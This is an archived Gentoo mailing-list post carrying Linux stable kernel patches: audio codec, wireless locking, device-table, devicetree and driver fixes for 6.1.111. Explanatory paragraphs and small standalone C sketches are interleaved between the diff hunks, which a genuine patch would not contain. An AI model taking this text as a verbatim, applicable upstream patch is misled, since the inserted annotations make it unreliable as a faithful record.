++		err = nft_socket_cgroup_subtree_level();
++		if (err < 0)
++			return err;
++
++		priv->level_user = level;
++
++		level += err;
++		/* Implies a giant cgroup tree */
++		if (WARN_ON_ONCE(level > 255))
++			return -EOPNOTSUPP;
++
+ 		priv->level = level;
+ 		len = sizeof(u64);
+ 		break;
+@@ -209,7 +244,7 @@ static int nft_socket_dump(struct sk_buff *skb,
+ 	if (nft_dump_register(skb, NFTA_SOCKET_DREG, priv->dreg))
+ 		return -1;
+ 	if (priv->key == NFT_SOCKET_CGROUPV2 &&
+-	    nla_put_be32(skb, NFTA_SOCKET_LEVEL, htonl(priv->level)))
++	    nla_put_be32(skb, NFTA_SOCKET_LEVEL, htonl(priv->level_user)))
+ 		return -1;
+ 	return 0;
+ }
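
The nft_socket change stores the level the user asked for separately from the
level actually extracted, because inside a container the netns root cgroup
already sits some levels below the global root.  A minimal sketch of that
translation, assuming the root's depth is known (placeholder error values,
not the kernel API):

#include <stdio.h>

static int effective_level(int user_level, int root_level)
{
	int level = user_level + root_level;

	if (level > 255)	/* must fit the u8 in struct nft_socket */
		return -1;	/* the kernel returns -EOPNOTSUPP here */
	return level;
}

int main(void)
{
	/* e.g. a container whose "/" is already two levels deep */
	printf("user level 3 -> ancestor level %d\n", effective_level(3, 2));
	printf("user level 254 -> %d (rejected)\n", effective_level(254, 2));
	return 0;
}
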
+diff --git a/net/wireless/core.h b/net/wireless/core.h
+index 8118b8614ac680..ee980965a7cfbb 100644
+--- a/net/wireless/core.h
++++ b/net/wireless/core.h
+@@ -228,7 +228,6 @@ void cfg80211_register_wdev(struct cfg80211_registered_device *rdev,
+ static inline void wdev_lock(struct wireless_dev *wdev)
+ 	__acquires(wdev)
+ {
+-	lockdep_assert_held(&wdev->wiphy->mtx);
+ 	mutex_lock(&wdev->mtx);
+ 	__acquire(wdev->mtx);
+ }
+@@ -236,16 +235,11 @@ static inline void wdev_lock(struct wireless_dev *wdev)
+ static inline void wdev_unlock(struct wireless_dev *wdev)
+ 	__releases(wdev)
+ {
+-	lockdep_assert_held(&wdev->wiphy->mtx);
+ 	__release(wdev->mtx);
+ 	mutex_unlock(&wdev->mtx);
+ }
+ 
+-static inline void ASSERT_WDEV_LOCK(struct wireless_dev *wdev)
+-{
+-	lockdep_assert_held(&wdev->wiphy->mtx);
+-	lockdep_assert_held(&wdev->mtx);
+-}
++#define ASSERT_WDEV_LOCK(wdev) lockdep_assert_held(&(wdev)->mtx)
+ 
+ static inline bool cfg80211_has_monitors_only(struct cfg80211_registered_device *rdev)
+ {
+diff --git a/sound/pci/hda/patch_realtek.c b/sound/pci/hda/patch_realtek.c
+index d869d6ba96f3dc..277303cbe96de2 100644
+--- a/sound/pci/hda/patch_realtek.c
++++ b/sound/pci/hda/patch_realtek.c
+@@ -4928,6 +4928,30 @@ static void alc269_fixup_hp_line1_mic1_led(struct hda_codec *codec,
+ 	}
+ }
+ 
++static void alc_hp_mute_disable(struct hda_codec *codec, unsigned int delay)
++{
++	if (delay <= 0)
++		delay = 75;
++	snd_hda_codec_write(codec, 0x21, 0,
++		    AC_VERB_SET_AMP_GAIN_MUTE, AMP_OUT_MUTE);
++	msleep(delay);
++	snd_hda_codec_write(codec, 0x21, 0,
++		    AC_VERB_SET_PIN_WIDGET_CONTROL, 0x0);
++	msleep(delay);
++}
++
++static void alc_hp_enable_unmute(struct hda_codec *codec, unsigned int delay)
++{
++	if (delay <= 0)
++		delay = 75;
++	snd_hda_codec_write(codec, 0x21, 0,
++		    AC_VERB_SET_PIN_WIDGET_CONTROL, PIN_OUT);
++	msleep(delay);
++	snd_hda_codec_write(codec, 0x21, 0,
++		    AC_VERB_SET_AMP_GAIN_MUTE, AMP_OUT_UNMUTE);
++	msleep(delay);
++}
++
+ static const struct coef_fw alc225_pre_hsmode[] = {
+ 	UPDATE_COEF(0x4a, 1<<8, 0),
+ 	UPDATE_COEFEX(0x57, 0x05, 1<<14, 0),
+@@ -5029,6 +5053,7 @@ static void alc_headset_mode_unplugged(struct hda_codec *codec)
+ 	case 0x10ec0236:
+ 	case 0x10ec0256:
+ 	case 0x19e58326:
++		alc_hp_mute_disable(codec, 75);
+ 		alc_process_coef_fw(codec, coef0256);
+ 		break;
+ 	case 0x10ec0234:
+@@ -5063,6 +5088,7 @@ static void alc_headset_mode_unplugged(struct hda_codec *codec)
+ 	case 0x10ec0295:
+ 	case 0x10ec0289:
+ 	case 0x10ec0299:
++		alc_hp_mute_disable(codec, 75);
+ 		alc_process_coef_fw(codec, alc225_pre_hsmode);
+ 		alc_process_coef_fw(codec, coef0225);
+ 		break;
+@@ -5288,6 +5314,7 @@ static void alc_headset_mode_default(struct hda_codec *codec)
+ 	case 0x10ec0299:
+ 		alc_process_coef_fw(codec, alc225_pre_hsmode);
+ 		alc_process_coef_fw(codec, coef0225);
++		alc_hp_enable_unmute(codec, 75);
+ 		break;
+ 	case 0x10ec0255:
+ 		alc_process_coef_fw(codec, coef0255);
+@@ -5300,6 +5327,7 @@ static void alc_headset_mode_default(struct hda_codec *codec)
+ 		alc_write_coef_idx(codec, 0x45, 0xc089);
+ 		msleep(50);
+ 		alc_process_coef_fw(codec, coef0256);
++		alc_hp_enable_unmute(codec, 75);
+ 		break;
+ 	case 0x10ec0234:
+ 	case 0x10ec0274:
+@@ -5397,6 +5425,7 @@ static void alc_headset_mode_ctia(struct hda_codec *codec)
+ 	case 0x10ec0256:
+ 	case 0x19e58326:
+ 		alc_process_coef_fw(codec, coef0256);
++		alc_hp_enable_unmute(codec, 75);
+ 		break;
+ 	case 0x10ec0234:
+ 	case 0x10ec0274:
+@@ -5445,6 +5474,7 @@ static void alc_headset_mode_ctia(struct hda_codec *codec)
+ 			alc_process_coef_fw(codec, coef0225_2);
+ 		else
+ 			alc_process_coef_fw(codec, coef0225_1);
++		alc_hp_enable_unmute(codec, 75);
+ 		break;
+ 	case 0x10ec0867:
+ 		alc_update_coefex_idx(codec, 0x57, 0x5, 1<<14, 0);
+@@ -5512,6 +5542,7 @@ static void alc_headset_mode_omtp(struct hda_codec *codec)
+ 	case 0x10ec0256:
+ 	case 0x19e58326:
+ 		alc_process_coef_fw(codec, coef0256);
++		alc_hp_enable_unmute(codec, 75);
+ 		break;
+ 	case 0x10ec0234:
+ 	case 0x10ec0274:
+@@ -5549,6 +5580,7 @@ static void alc_headset_mode_omtp(struct hda_codec *codec)
+ 	case 0x10ec0289:
+ 	case 0x10ec0299:
+ 		alc_process_coef_fw(codec, coef0225);
++		alc_hp_enable_unmute(codec, 75);
+ 		break;
+ 	}
+ 	codec_dbg(codec, "Headset jack set to Nokia-style headset mode.\n");
+@@ -5617,25 +5649,21 @@ static void alc_determine_headset_type(struct hda_codec *codec)
+ 		alc_write_coef_idx(codec, 0x06, 0x6104);
+ 		alc_write_coefex_idx(codec, 0x57, 0x3, 0x09a3);
+ 
+-		snd_hda_codec_write(codec, 0x21, 0,
+-			    AC_VERB_SET_AMP_GAIN_MUTE, AMP_OUT_MUTE);
+-		msleep(80);
+-		snd_hda_codec_write(codec, 0x21, 0,
+-			    AC_VERB_SET_PIN_WIDGET_CONTROL, 0x0);
+-
+ 		alc_process_coef_fw(codec, coef0255);
+ 		msleep(300);
+ 		val = alc_read_coef_idx(codec, 0x46);
+ 		is_ctia = (val & 0x0070) == 0x0070;
+-
++		if (!is_ctia) {
++			alc_write_coef_idx(codec, 0x45, 0xe089);
++			msleep(100);
++			val = alc_read_coef_idx(codec, 0x46);
++			if ((val & 0x0070) == 0x0070)
++				is_ctia = false;
++			else
++				is_ctia = true;
++		}
+ 		alc_write_coefex_idx(codec, 0x57, 0x3, 0x0da3);
+ 		alc_update_coefex_idx(codec, 0x57, 0x5, 1<<14, 0);
+-
+-		snd_hda_codec_write(codec, 0x21, 0,
+-			    AC_VERB_SET_PIN_WIDGET_CONTROL, PIN_OUT);
+-		msleep(80);
+-		snd_hda_codec_write(codec, 0x21, 0,
+-			    AC_VERB_SET_AMP_GAIN_MUTE, AMP_OUT_UNMUTE);
+ 		break;
+ 	case 0x10ec0234:
+ 	case 0x10ec0274:
+@@ -5712,12 +5740,6 @@ static void alc_determine_headset_type(struct hda_codec *codec)
+ 	case 0x10ec0295:
+ 	case 0x10ec0289:
+ 	case 0x10ec0299:
+-		snd_hda_codec_write(codec, 0x21, 0,
+-			    AC_VERB_SET_AMP_GAIN_MUTE, AMP_OUT_MUTE);
+-		msleep(80);
+-		snd_hda_codec_write(codec, 0x21, 0,
+-			    AC_VERB_SET_PIN_WIDGET_CONTROL, 0x0);
+-
+ 		alc_process_coef_fw(codec, alc225_pre_hsmode);
+ 		alc_update_coef_idx(codec, 0x67, 0xf000, 0x1000);
+ 		val = alc_read_coef_idx(codec, 0x45);
+@@ -5734,15 +5756,19 @@ static void alc_determine_headset_type(struct hda_codec *codec)
+ 			val = alc_read_coef_idx(codec, 0x46);
+ 			is_ctia = (val & 0x00f0) == 0x00f0;
+ 		}
++		if (!is_ctia) {
++			alc_update_coef_idx(codec, 0x45, 0x3f<<10, 0x38<<10);
++			alc_update_coef_idx(codec, 0x49, 3<<8, 1<<8);
++			msleep(100);
++			val = alc_read_coef_idx(codec, 0x46);
++			if ((val & 0x00f0) == 0x00f0)
++				is_ctia = false;
++			else
++				is_ctia = true;
++		}
+ 		alc_update_coef_idx(codec, 0x4a, 7<<6, 7<<6);
+ 		alc_update_coef_idx(codec, 0x4a, 3<<4, 3<<4);
+ 		alc_update_coef_idx(codec, 0x67, 0xf000, 0x3000);
+-
+-		snd_hda_codec_write(codec, 0x21, 0,
+-			    AC_VERB_SET_PIN_WIDGET_CONTROL, PIN_OUT);
+-		msleep(80);
+-		snd_hda_codec_write(codec, 0x21, 0,
+-			    AC_VERB_SET_AMP_GAIN_MUTE, AMP_OUT_UNMUTE);
+ 		break;
+ 	case 0x10ec0867:
+ 		is_ctia = true;
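
The patch_realtek.c changes do two things: hoist the mute/unmute of pin 0x21
into alc_hp_mute_disable()/alc_hp_enable_unmute() so every headset-mode path
quiesces the pin the same way, and add a second sample to the CTIA/OMTP probe
when the first read is inconclusive.  A schematic of the retry flow, with
fabricated register reads standing in for the coef accesses:

#include <stdbool.h>
#include <stdio.h>

/* Pretend the first sample was taken before the mic bias settled. */
static unsigned int read_coef_0x46(int attempt)
{
	return attempt == 0 ? 0x0000 : 0x0070;
}

int main(void)
{
	bool is_ctia = (read_coef_0x46(0) & 0x0070) == 0x0070;

	if (!is_ctia) {
		/* re-drive the bias, wait, then sample once more */
		is_ctia = (read_coef_0x46(1) & 0x0070) != 0x0070;
	}
	printf("headset type: %s\n", is_ctia ? "CTIA" : "OMTP");
	return 0;
}
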
+diff --git a/sound/soc/amd/acp/acp-sof-mach.c b/sound/soc/amd/acp/acp-sof-mach.c
+index 972600d271586d..c594af432b3ee0 100644
+--- a/sound/soc/amd/acp/acp-sof-mach.c
++++ b/sound/soc/amd/acp/acp-sof-mach.c
+@@ -152,6 +152,8 @@ static const struct platform_device_id board_ids[] = {
+ 	},
+ 	{ }
+ };
++MODULE_DEVICE_TABLE(platform, board_ids);
++
+ static struct platform_driver acp_asoc_audio = {
+ 	.driver = {
+ 		.name = "sof_mach",
+diff --git a/sound/soc/au1x/db1200.c b/sound/soc/au1x/db1200.c
+index 400eaf9f8b1407..f185711180cb46 100644
+--- a/sound/soc/au1x/db1200.c
++++ b/sound/soc/au1x/db1200.c
+@@ -44,6 +44,7 @@ static const struct platform_device_id db1200_pids[] = {
+ 	},
+ 	{},
+ };
++MODULE_DEVICE_TABLE(platform, db1200_pids);
+ 
+ /*-------------------------  AC97 PART  ---------------------------*/
+ 
+diff --git a/sound/soc/codecs/tda7419.c b/sound/soc/codecs/tda7419.c
+index d964e5207569ce..6010df2994c7bf 100644
+--- a/sound/soc/codecs/tda7419.c
++++ b/sound/soc/codecs/tda7419.c
+@@ -623,6 +623,7 @@ static const struct of_device_id tda7419_of_match[] = {
+ 	{ .compatible = "st,tda7419" },
+ 	{ },
+ };
++MODULE_DEVICE_TABLE(of, tda7419_of_match);
+ 
+ static struct i2c_driver tda7419_driver = {
+ 	.driver = {
+diff --git a/sound/soc/intel/common/soc-acpi-intel-cht-match.c b/sound/soc/intel/common/soc-acpi-intel-cht-match.c
+index 5e2ec60e2954b2..e4c3492a0c2824 100644
+--- a/sound/soc/intel/common/soc-acpi-intel-cht-match.c
++++ b/sound/soc/intel/common/soc-acpi-intel-cht-match.c
+@@ -84,7 +84,6 @@ static const struct dmi_system_id lenovo_yoga_tab3_x90[] = {
+ 		/* Lenovo Yoga Tab 3 Pro YT3-X90, codec missing from DSDT */
+ 		.matches = {
+ 			DMI_MATCH(DMI_SYS_VENDOR, "Intel Corporation"),
+-			DMI_MATCH(DMI_PRODUCT_NAME, "CHERRYVIEW D1 PLATFORM"),
+ 			DMI_MATCH(DMI_PRODUCT_VERSION, "Blade3-10A-001"),
+ 		},
+ 	},
+diff --git a/sound/soc/intel/keembay/kmb_platform.c b/sound/soc/intel/keembay/kmb_platform.c
+index b4893365d01d5e..d5c48bed7a2504 100644
+--- a/sound/soc/intel/keembay/kmb_platform.c
++++ b/sound/soc/intel/keembay/kmb_platform.c
+@@ -817,6 +817,7 @@ static const struct of_device_id kmb_plat_of_match[] = {
+ 	{ .compatible = "intel,keembay-tdm", .data = &intel_kmb_tdm_dai},
+ 	{}
+ };
++MODULE_DEVICE_TABLE(of, kmb_plat_of_match);
+ 
+ static int kmb_plat_dai_probe(struct platform_device *pdev)
+ {
+diff --git a/sound/soc/sof/mediatek/mt8195/mt8195.c b/sound/soc/sof/mediatek/mt8195/mt8195.c
+index 53cadbe8a05cc0..ac96ea07e591bf 100644
+--- a/sound/soc/sof/mediatek/mt8195/mt8195.c
++++ b/sound/soc/sof/mediatek/mt8195/mt8195.c
+@@ -663,6 +663,9 @@ static struct snd_sof_of_mach sof_mt8195_machs[] = {
+ 	{
+ 		.compatible = "google,tomato",
+ 		.sof_tplg_filename = "sof-mt8195-mt6359-rt1019-rt5682.tplg"
++	}, {
++		.compatible = "google,dojo",
++		.sof_tplg_filename = "sof-mt8195-mt6359-max98390-rt5682.tplg"
+ 	}, {
+ 		.compatible = "mediatek,mt8195",
+ 		.sof_tplg_filename = "sof-mt8195.tplg"
+diff --git a/tools/hv/Makefile b/tools/hv/Makefile
+index fe770e679ae8fe..5643058e2d377b 100644
+--- a/tools/hv/Makefile
++++ b/tools/hv/Makefile
+@@ -47,7 +47,7 @@ $(OUTPUT)hv_fcopy_daemon: $(HV_FCOPY_DAEMON_IN)
+ 
+ clean:
+ 	rm -f $(ALL_PROGRAMS)
+-	find $(or $(OUTPUT),.) -name '*.o' -delete -o -name '\.*.d' -delete
++	find $(or $(OUTPUT),.) -name '*.o' -delete -o -name '\.*.d' -delete -o -name '\.*.cmd' -delete
+ 
+ install: $(ALL_PROGRAMS)
+ 	install -d -m 755 $(DESTDIR)$(sbindir); \
+diff --git a/tools/testing/selftests/net/mptcp/mptcp_join.sh b/tools/testing/selftests/net/mptcp/mptcp_join.sh
+index 446b8daa23e071..ed7c0193ffc374 100755
+--- a/tools/testing/selftests/net/mptcp/mptcp_join.sh
++++ b/tools/testing/selftests/net/mptcp/mptcp_join.sh
+@@ -3048,7 +3048,9 @@ fullmesh_tests()
+ 		pm_nl_set_limits $ns1 1 3
+ 		pm_nl_set_limits $ns2 1 3
+ 		pm_nl_add_endpoint $ns1 10.0.2.1 flags signal
+-		pm_nl_add_endpoint $ns2 10.0.1.2 flags subflow,fullmesh
++		if mptcp_lib_kallsyms_has "mptcp_pm_subflow_check_next$"; then
++			pm_nl_add_endpoint $ns2 10.0.1.2 flags subflow,fullmesh
++		fi
+ 		run_tests $ns1 $ns2 10.0.1.1 0 0 fullmesh_1 slow
+ 		chk_join_nr 3 3 3
+ 		chk_add_nr 1 1


^ permalink raw reply related	[flat|nested] 161+ messages in thread
* [gentoo-commits] proj/linux-patches:6.1 commit in: /
@ 2024-09-18 18:04 Mike Pagano
  0 siblings, 0 replies; 161+ messages in thread
From: Mike Pagano @ 2024-09-18 18:04 UTC (permalink / raw
  To: gentoo-commits

commit:     3628dcd5601148478929fb78d0ecbb2f0bc0b637
Author:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
AuthorDate: Wed Sep 18 18:04:33 2024 +0000
Commit:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
CommitDate: Wed Sep 18 18:04:33 2024 +0000
URL:        https://gitweb.gentoo.org/proj/linux-patches.git/commit/?id=3628dcd5

Linux patch 6.1.111

Signed-off-by: Mike Pagano <mpagano <AT> gentoo.org>

 0000_README              |    4 +
 1110_linux-6.1.111.patch | 2123 ++++++++++++++++++++++++++++++++++++++++++++++
 2 files changed, 2127 insertions(+)

diff --git a/0000_README b/0000_README
index 4375fd0f..f2f39ba5 100644
--- a/0000_README
+++ b/0000_README
@@ -487,6 +487,10 @@ Patch:  1109_linux-6.1.110.patch
 From:   https://www.kernel.org
 Desc:   Linux 6.1.110
 
+Patch:  1110_linux-6.1.111.patch
+From:   https://www.kernel.org
+Desc:   Linux 6.1.111
+
 Patch:  1500_XATTR_USER_PREFIX.patch
 From:   https://bugs.gentoo.org/show_bug.cgi?id=470644
 Desc:   Support for namespace user.pax.* on tmpfs.

diff --git a/1110_linux-6.1.111.patch b/1110_linux-6.1.111.patch
new file mode 100644
index 00000000..61cbffda
--- /dev/null
+++ b/1110_linux-6.1.111.patch
@@ -0,0 +1,2123 @@
+diff --git a/Makefile b/Makefile
+index 0e055579c7211f..d2ff3ff026255a 100644
+--- a/Makefile
++++ b/Makefile
+@@ -1,7 +1,7 @@
+ # SPDX-License-Identifier: GPL-2.0
+ VERSION = 6
+ PATCHLEVEL = 1
+-SUBLEVEL = 110
++SUBLEVEL = 111
+ EXTRAVERSION =
+ NAME = Curry Ramen
+ 
+diff --git a/arch/arm64/boot/dts/rockchip/rk3328-rock-pi-e.dts b/arch/arm64/boot/dts/rockchip/rk3328-rock-pi-e.dts
+index d9905a08c6ce86..66443d52cd34d8 100644
+--- a/arch/arm64/boot/dts/rockchip/rk3328-rock-pi-e.dts
++++ b/arch/arm64/boot/dts/rockchip/rk3328-rock-pi-e.dts
+@@ -332,7 +332,7 @@ led_pin: led-pin {
+ 
+ 	pmic {
+ 		pmic_int_l: pmic-int-l {
+-			rockchip,pins = <2 RK_PA6 RK_FUNC_GPIO &pcfg_pull_up>;
++			rockchip,pins = <0 RK_PA2 RK_FUNC_GPIO &pcfg_pull_up>;
+ 		};
+ 	};
+ 
+diff --git a/arch/arm64/boot/dts/rockchip/rk3399-puma.dtsi b/arch/arm64/boot/dts/rockchip/rk3399-puma.dtsi
+index 937a15005eb0e9..e089e0c26a72d1 100644
+--- a/arch/arm64/boot/dts/rockchip/rk3399-puma.dtsi
++++ b/arch/arm64/boot/dts/rockchip/rk3399-puma.dtsi
+@@ -119,6 +119,22 @@ &emmc_phy {
+ 	drive-impedance-ohm = <33>;
+ };
+ 
++&gpio3 {
++	/*
++	 * The Qseven BIOS_DISABLE signal on the RK3399-Q7 keeps the on-module
++	 * eMMC and SPI flash powered-down initially (in fact it keeps the
++	 * reset signal asserted). The BIOS_DISABLE_OVERRIDE pin allows overriding
++	 * that signal so that eMMC and SPI can be used regardless of the state
++	 * of the signal.
++	 */
++	bios-disable-override-hog {
++		gpios = <RK_PD5 GPIO_ACTIVE_LOW>;
++		gpio-hog;
++		line-name = "bios_disable_override";
++		output-high;
++	};
++};
++
+ &gmac {
+ 	assigned-clocks = <&cru SCLK_RMII_SRC>;
+ 	assigned-clock-parents = <&clkin_gmac>;
+@@ -374,6 +390,7 @@ vdd_cpu_b: regulator@60 {
+ 
+ &i2s0 {
+ 	pinctrl-0 = <&i2s0_2ch_bus>;
++	pinctrl-1 = <&i2s0_2ch_bus_bclk_off>;
+ 	rockchip,playback-channels = <2>;
+ 	rockchip,capture-channels = <2>;
+ 	status = "okay";
+@@ -382,8 +399,8 @@ &i2s0 {
+ /*
+  * As Q7 does not specify neither a global nor a RX clock for I2S these
+  * signals are not used. Furthermore I2S0_LRCK_RX is used as GPIO.
+- * Therefore we have to redefine the i2s0_2ch_bus definition to prevent
+- * conflicts.
++ * Therefore we have to redefine the i2s0_2ch_bus and i2s0_2ch_bus_bclk_off
++ * definitions to prevent conflicts.
+  */
+ &i2s0_2ch_bus {
+ 	rockchip,pins =
+@@ -393,6 +410,14 @@ &i2s0_2ch_bus {
+ 		<3 RK_PD7 1 &pcfg_pull_none>;
+ };
+ 
++&i2s0_2ch_bus_bclk_off {
++	rockchip,pins =
++		<3 RK_PD0 RK_FUNC_GPIO &pcfg_pull_none>,
++		<3 RK_PD2 1 &pcfg_pull_none>,
++		<3 RK_PD3 1 &pcfg_pull_none>,
++		<3 RK_PD7 1 &pcfg_pull_none>;
++};
++
+ &io_domains {
+ 	status = "okay";
+ 	bt656-supply = <&vcc_1v8>;
+@@ -408,9 +433,14 @@ &pcie_clkreqn_cpm {
+ 
+ &pinctrl {
+ 	pinctrl-names = "default";
+-	pinctrl-0 = <&q7_thermal_pin>;
++	pinctrl-0 = <&q7_thermal_pin &bios_disable_override_hog_pin>;
+ 
+ 	gpios {
++		bios_disable_override_hog_pin: bios-disable-override-hog-pin {
++			rockchip,pins =
++				<3 RK_PD5 RK_FUNC_GPIO &pcfg_pull_down>;
++		};
++
+ 		q7_thermal_pin: q7-thermal-pin {
+ 			rockchip,pins =
+ 				<0 RK_PA3 RK_FUNC_GPIO &pcfg_pull_up>;
+diff --git a/arch/powerpc/kernel/setup-common.c b/arch/powerpc/kernel/setup-common.c
+index 59b4ac57bfaf7d..56f6b958926d7c 100644
+--- a/arch/powerpc/kernel/setup-common.c
++++ b/arch/powerpc/kernel/setup-common.c
+@@ -948,6 +948,7 @@ void __init setup_arch(char **cmdline_p)
+ 	mem_topology_setup();
+ 	/* Set max_mapnr before paging_init() */
+ 	set_max_mapnr(max_pfn);
++	high_memory = (void *)__va(max_low_pfn * PAGE_SIZE);
+ 
+ 	/*
+ 	 * Release secondary cpus out of their spinloops at 0x60 now that
+diff --git a/arch/powerpc/mm/mem.c b/arch/powerpc/mm/mem.c
+index c7599b1737099a..40f4a31f001c2d 100644
+--- a/arch/powerpc/mm/mem.c
++++ b/arch/powerpc/mm/mem.c
+@@ -287,8 +287,6 @@ void __init mem_init(void)
+ 	swiotlb_init(ppc_swiotlb_enable, ppc_swiotlb_flags);
+ #endif
+ 
+-	high_memory = (void *) __va(max_low_pfn * PAGE_SIZE);
+-
+ 	kasan_late_init();
+ 
+ 	memblock_free_all();
+diff --git a/drivers/cxl/cxlmem.h b/drivers/cxl/cxlmem.h
+index b58a5b782e5dcc..0be48441d0f295 100644
+--- a/drivers/cxl/cxlmem.h
++++ b/drivers/cxl/cxlmem.h
+@@ -293,7 +293,7 @@ enum cxl_opcode {
+ 		  0x3b, 0x3f, 0x17)
+ 
+ #define DEFINE_CXL_VENDOR_DEBUG_UUID                                           \
+-	UUID_INIT(0xe1819d9, 0x11a9, 0x400c, 0x81, 0x1f, 0xd6, 0x07, 0x19,     \
++	UUID_INIT(0x5e1819d9, 0x11a9, 0x400c, 0x81, 0x1f, 0xd6, 0x07, 0x19,     \
+ 		  0x40, 0x3d, 0x86)
+ 
+ struct cxl_mbox_get_supported_logs {
+diff --git a/drivers/dma-buf/heaps/cma_heap.c b/drivers/dma-buf/heaps/cma_heap.c
+index 28fb04eccdd0ca..ec2a2a1560a472 100644
+--- a/drivers/dma-buf/heaps/cma_heap.c
++++ b/drivers/dma-buf/heaps/cma_heap.c
+@@ -165,7 +165,7 @@ static vm_fault_t cma_heap_vm_fault(struct vm_fault *vmf)
+ 	struct vm_area_struct *vma = vmf->vma;
+ 	struct cma_heap_buffer *buffer = vma->vm_private_data;
+ 
+-	if (vmf->pgoff > buffer->pagecount)
++	if (vmf->pgoff >= buffer->pagecount)
+ 		return VM_FAULT_SIGBUS;
+ 
+ 	vmf->page = buffer->pages[vmf->pgoff];
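
The fix above is the textbook off-by-one: buffer->pages[] holds pagecount entries indexed 0..pagecount-1, so a fault at pgoff == pagecount must be refused, which requires '>=' rather than '>'. A minimal userspace C sketch of the same invariant (array name and size invented for illustration):

#include <stdio.h>

#define PAGECOUNT 4

/* valid indices are 0 .. PAGECOUNT - 1, so '>=' is the correct guard */
static int lookup(const int *pages, unsigned long pgoff)
{
	if (pgoff >= PAGECOUNT)
		return -1;	/* the driver returns VM_FAULT_SIGBUS here */
	return pages[pgoff];
}

int main(void)
{
	int pages[PAGECOUNT] = { 10, 11, 12, 13 };

	printf("%d\n", lookup(pages, 3));	/* 13: last valid page */
	printf("%d\n", lookup(pages, 4));	/* -1: one past the end */
	return 0;
}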
+diff --git a/drivers/gpu/drm/amd/include/atomfirmware.h b/drivers/gpu/drm/amd/include/atomfirmware.h
+index 6ea596a8a03dfe..dea810c9b8fb1f 100644
+--- a/drivers/gpu/drm/amd/include/atomfirmware.h
++++ b/drivers/gpu/drm/amd/include/atomfirmware.h
+@@ -1005,7 +1005,7 @@ struct display_object_info_table_v1_4
+   uint16_t  supporteddevices;
+   uint8_t   number_of_path;
+   uint8_t   reserved;
+-  struct    atom_display_object_path_v2 display_path[8];   //the real number of this included in the structure is calculated by using the (whole structure size - the header size- number_of_path)/size of atom_display_object_path
++  struct    atom_display_object_path_v2 display_path[];   //the real number of entries included in the structure is calculated as (whole structure size - header size - number_of_path)/sizeof(atom_display_object_path)
+ };
+ 
+ struct display_object_info_table_v1_5 {
+@@ -1015,7 +1015,7 @@ struct display_object_info_table_v1_5 {
+ 	uint8_t reserved;
+ 	// the real number of entries included in the structure is calculated as
+ 	// (whole structure size - header size - number_of_path)/sizeof(atom_display_object_path)
+-	struct atom_display_object_path_v3 display_path[8];
++	struct atom_display_object_path_v3 display_path[];
+ };
+ 
+ /* 
+diff --git a/drivers/gpu/drm/drm_panel_orientation_quirks.c b/drivers/gpu/drm/drm_panel_orientation_quirks.c
+index 039da0d1a613b7..5b2506c65e9520 100644
+--- a/drivers/gpu/drm/drm_panel_orientation_quirks.c
++++ b/drivers/gpu/drm/drm_panel_orientation_quirks.c
+@@ -208,6 +208,18 @@ static const struct dmi_system_id orientation_data[] = {
+ 		  DMI_MATCH(DMI_BOARD_NAME, "KUN"),
+ 		},
+ 		.driver_data = (void *)&lcd1600x2560_rightside_up,
++	}, {    /* AYN Loki Max */
++		.matches = {
++			DMI_EXACT_MATCH(DMI_SYS_VENDOR, "ayn"),
++			DMI_EXACT_MATCH(DMI_PRODUCT_NAME, "Loki Max"),
++		},
++		.driver_data = (void *)&lcd1080x1920_leftside_up,
++	}, {	/* AYN Loki Zero */
++		.matches = {
++			DMI_EXACT_MATCH(DMI_SYS_VENDOR, "ayn"),
++			DMI_EXACT_MATCH(DMI_PRODUCT_NAME, "Loki Zero"),
++		},
++		.driver_data = (void *)&lcd1080x1920_leftside_up,
+ 	}, {	/* Chuwi HiBook (CWI514) */
+ 		.matches = {
+ 			DMI_MATCH(DMI_BOARD_VENDOR, "Hampoo"),
+diff --git a/drivers/gpu/drm/i915/gt/uc/intel_guc_submission.c b/drivers/gpu/drm/i915/gt/uc/intel_guc_submission.c
+index fecdc7ea78ebdf..56df4c4a8a1a84 100644
+--- a/drivers/gpu/drm/i915/gt/uc/intel_guc_submission.c
++++ b/drivers/gpu/drm/i915/gt/uc/intel_guc_submission.c
+@@ -2603,9 +2603,9 @@ static void prepare_context_registration_info_v70(struct intel_context *ce,
+ 		ce->parallel.guc.wqi_tail = 0;
+ 		ce->parallel.guc.wqi_head = 0;
+ 
+-		wq_desc_offset = i915_ggtt_offset(ce->state) +
++		wq_desc_offset = (u64)i915_ggtt_offset(ce->state) +
+ 				 __get_parent_scratch_offset(ce);
+-		wq_base_offset = i915_ggtt_offset(ce->state) +
++		wq_base_offset = (u64)i915_ggtt_offset(ce->state) +
+ 				 __get_wq_offset(ce);
+ 		info->wq_desc_lo = lower_32_bits(wq_desc_offset);
+ 		info->wq_desc_hi = upper_32_bits(wq_desc_offset);
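
The casts matter because C computes the sum of two 32-bit values in 32 bits and only then converts to the 64-bit destination, so a large GGTT offset plus a scratch offset could wrap before lower_32_bits()/upper_32_bits() ever see it. A self-contained sketch of the difference (values chosen only to force the wrap):

#include <stdio.h>
#include <stdint.h>

int main(void)
{
	uint32_t base = 0xfffff000u;
	uint32_t off  = 0x2000u;

	uint64_t wrong = base + off;		/* 32-bit add wraps, then widens */
	uint64_t right = (uint64_t)base + off;	/* widened before the add */

	printf("wrong: 0x%llx\n", (unsigned long long)wrong);	/* 0x1000 */
	printf("right: 0x%llx\n", (unsigned long long)right);	/* 0x100001000 */
	return 0;
}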
+diff --git a/drivers/gpu/drm/msm/adreno/adreno_gpu.c b/drivers/gpu/drm/msm/adreno/adreno_gpu.c
+index dfd4eec217859e..c4ad70eb1d923f 100644
+--- a/drivers/gpu/drm/msm/adreno/adreno_gpu.c
++++ b/drivers/gpu/drm/msm/adreno/adreno_gpu.c
+@@ -99,7 +99,7 @@ static int zap_shader_load_mdt(struct msm_gpu *gpu, const char *fwname,
+ 		 * was a bad idea, and is only provided for backwards
+ 		 * compatibility for older targets.
+ 		 */
+-		return -ENODEV;
++		return -ENOENT;
+ 	}
+ 
+ 	if (IS_ERR(fw)) {
+diff --git a/drivers/hid/hid-ids.h b/drivers/hid/hid-ids.h
+index 1395270a30cb0d..3359a24ca2419d 100644
+--- a/drivers/hid/hid-ids.h
++++ b/drivers/hid/hid-ids.h
+@@ -506,6 +506,8 @@
+ #define USB_DEVICE_ID_GENERAL_TOUCH_WIN8_PIT_E100 0xe100
+ 
+ #define I2C_VENDOR_ID_GOODIX		0x27c6
++#define I2C_DEVICE_ID_GOODIX_01E8	0x01e8
